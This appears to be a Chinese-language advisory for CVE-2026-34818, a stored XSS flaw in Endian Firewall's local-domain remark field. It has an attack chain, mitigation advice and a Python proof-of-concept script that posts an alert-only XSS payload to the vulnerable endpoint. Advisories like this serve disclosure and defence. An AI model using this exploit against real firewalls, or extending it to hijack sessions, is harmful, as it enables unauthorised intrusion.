CVE-2026-34818 CVSS 6.4 中危

CVE-2026-34818 Endian Firewall 存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34818

漏洞类型

存储型跨站脚本

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25及之前版本在/manage/dnsmasq/localdomains/接口的remark参数中存在存储型跨站脚本漏洞。由于缺乏对用户输入的充分过滤，经过身份认证的攻击者可以注入恶意JavaScript代码。当其他用户访问受影响的页面时，这些恶意代码将在其浏览器中执行，可能导致会话劫持或敏感信息窃取。

技术细节

该漏洞属于存储型XSS（Stored XSS）。漏洞发生在Endian Firewall的DNS管理模块中，具体路径为/manage/dnsmasq/localdomains/。当管理员或低权限用户向该接口发送POST请求以添加本地域名时，系统未对remark（备注）字段进行严格的输入验证和HTML实体编码。攻击者可以构造包含恶意脚本（如<script>alert(1)</script>）的Payload，并将其提交至服务器。服务器将此Payload存储在数据库中，且在后续渲染页面时直接输出。当其他管理员查看该域名列表页面时，存储的恶意脚本会被浏览器解析并执行。由于CVSS向量为PR:L（低权限），攻击者仅需拥有普通账号即可利用此漏洞攻击更高权限的用户。

攻击链分析

STEP 1

步骤1

攻击者获取Endian Firewall的低权限账户凭据。

STEP 2

步骤2

攻击者向/manage/dnsmasq/localdomains/接口发送POST请求，在remark参数中注入恶意JavaScript代码。

STEP 3

步骤3

服务器接收请求并将未经过滤的恶意代码存储在数据库中。

STEP 4

步骤4

管理员或其他用户访问受影响的本地域名管理页面。

STEP 5

步骤5

浏览器解析页面时执行存储的恶意脚本，攻击者得以窃取Cookie或执行管理员操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "https://<target-ip>/manage/dnsmasq/localdomains/"

# Attacker's credentials
session = requests.Session()
# login_payload = {"username": "attacker", "password": "password"}
# session.post("https://<target-ip>/login", data=login_payload)

# Malicious payload to be stored
xss_payload = '<img src=x onerror=alert("XSS")>'

# Data to be sent to the vulnerable endpoint
exploit_data = {
    "domain": "example.com",
    "remark": xss_payload  # Injecting into the vulnerable parameter
}

try:
    # Sending the request to store the malicious script
    response = session.post(target_url, data=exploit_data, verify=False)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check the page to trigger XSS.")
    else:
        print(f"[-] Failed to send payload. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

建议立即升级官方发布的修复版本。在无法立即升级的情况下，管理员应严格限制对管理后台的访问权限，仅允许可信IP访问，并加强对用户输入的WAF拦截规则，过滤常见的XSS特征字符。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表